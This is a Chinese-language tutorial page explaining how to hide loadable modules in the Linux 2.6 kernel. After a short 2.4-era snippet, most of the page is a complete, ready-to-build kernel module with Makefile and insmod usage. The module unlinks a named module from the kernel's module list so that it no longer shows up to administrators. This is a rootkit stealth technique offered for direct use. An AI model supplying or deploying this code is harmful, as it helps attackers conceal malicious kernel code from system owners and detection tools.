歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux管理 >> Linux維護

教你怎樣隱藏Linux 2.6內核模塊

  2.6內核與2.4內核相比,有了許多變化,模塊部分的實現完全重寫,結構也有了一些變化。2.4內核中模塊隱藏的方式為:(參考madsys的phrack 61-03)
struct module *p;
for (p=&__this_module; p->next; p=p->next)
  {
    if (strcmp(p->next->name, str))
      continue;       
    p->next=p->next->next; // <-- here it removes that module
    break;
  }
2.4的module定義為:
struct module
{
  unsigned long size_of_struct; /* == sizeof(module) */
  struct module *next;
  const char *name;
  unsigned long size;
  ...
}
2.6為:
struct module
{
  enum module_state state;
  /* Member of list of modules */
  struct list_head list; <--- 變成了雙向鏈表
  /* Unique handle for this module */
  char name[MODULE_NAME_LEN];
  ...
}
因此使用標准的內核list系列處理函數(不需要再閉門造車了),2.6版的進程隱藏重寫為:
/*
* FileName: remove.c
* Author: CoolQ
* Date: 23:05 2004-9-2
* Makefile:
* ---------------- cut here -----------------
* obj-m += remove.o
* KDIR:= /lib/modules/$(shell uname -r)/build
* PWD:= $(shell pwd)
* default:
* $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
*----------------- cut here -----------------
* Compile:
* [root@coolq tmp]make
* Usage:
* [root@coolq tmp]insmod remove.ko mod_name=module_name_to_hide
*/
#include <linux/init.h>
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/kernel.h>
#include <linux/list.h>
#include <linux/string.h>
static char *mod_name = "module";
module_param(mod_name, charp, 0);
static int remove_init(void)
{
  struct module *mod_head, *mod_counter;
  struct list_head *p;
  mod_head = &__this_module;
  list_for_each(p, &mod_head->list){
    mod_counter = list_entry(p, struct module, list);
    if(strcmp(mod_counter->name, mod_name) == 0){
      list_del(p);
      printk("remove module %s successfully.\n", mod_name);
      return 0;
    }
  }
  printk("Can't find module %s.\n", mod_name);
  return 0;
}
static void remove_exit(void)
{
}
module_init(remove_init);
module_exit(remove_exit);
MODULE_LICENSE("Dual BSD/GPL");
Copyright © Linux教程網 All Rights Reserved